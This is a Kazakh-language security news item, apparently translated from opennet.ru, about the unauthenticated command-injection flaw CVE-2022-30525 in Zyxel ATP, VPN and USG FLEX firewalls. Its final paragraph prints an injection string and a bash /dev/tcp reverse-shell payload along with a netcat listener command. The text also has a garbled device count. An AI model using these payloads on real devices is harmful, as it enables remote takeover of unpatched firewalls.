Аутентификациясыз кодты орындауға мүмкіндік беретін Zyxel брандмауэріндегі осалдық

ATP, VPN және USG FLEX сериясының Zyxel құрылғыларында маңызды осалдық (CVE-2022-30525) анықталды, ол кәсіпорындарда брандмауэр, IDS және VPN жұмысын ұйымдастыруға арналған, бұл сыртқы шабуылдаушыға компьютерде кодты орындауға мүмкіндік береді. аутентификациясыз пайдаланушы құқықтары жоқ құрылғы. Шабуыл жасау үшін шабуылдаушы HTTP/HTTPS протоколы арқылы құрылғыға сұраулар жібере алуы керек. Zyxel ZLD 5.30 микробағдарлама жаңартуындағы осалдықты түзетті. Shodan қызметінің мәліметі бойынша, қазіргі уақытта жаһандық желіде HTTP/HTTPS арқылы сұрауларды қабылдайтын 16213 XNUMX ықтимал осал құрылғылар бар.

Операция аутентификациясыз қол жетімді /ztp/cgi-bin/handler веб өңдеушісіне арнайы әзірленген пәрмендерді жіберу арқылы жүзеге асырылады. Мәселе lib_wan_settings.py кітапханасында пайдаланылатын және setWanPortSt операциясын өңдеу кезінде орындалатын os.system шақыруын пайдаланып жүйеде пәрмендерді орындау кезінде сұрау параметрлерінің дұрыс тазаланбауынан туындайды.

Мысалы, шабуылдаушы жолды өткізе алады «; ping 192.168.1.210;" бұл жүйеде «ping 192.168.1.210» пәрменін орындауға әкеледі. Пәрмен қабығына қол жеткізу үшін жүйеде “nc -lvnp 1270” іске қосып, содан кейін құрылғыға ‘; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.

Ақпарат көзі: opennet.ru

пікір қалдыру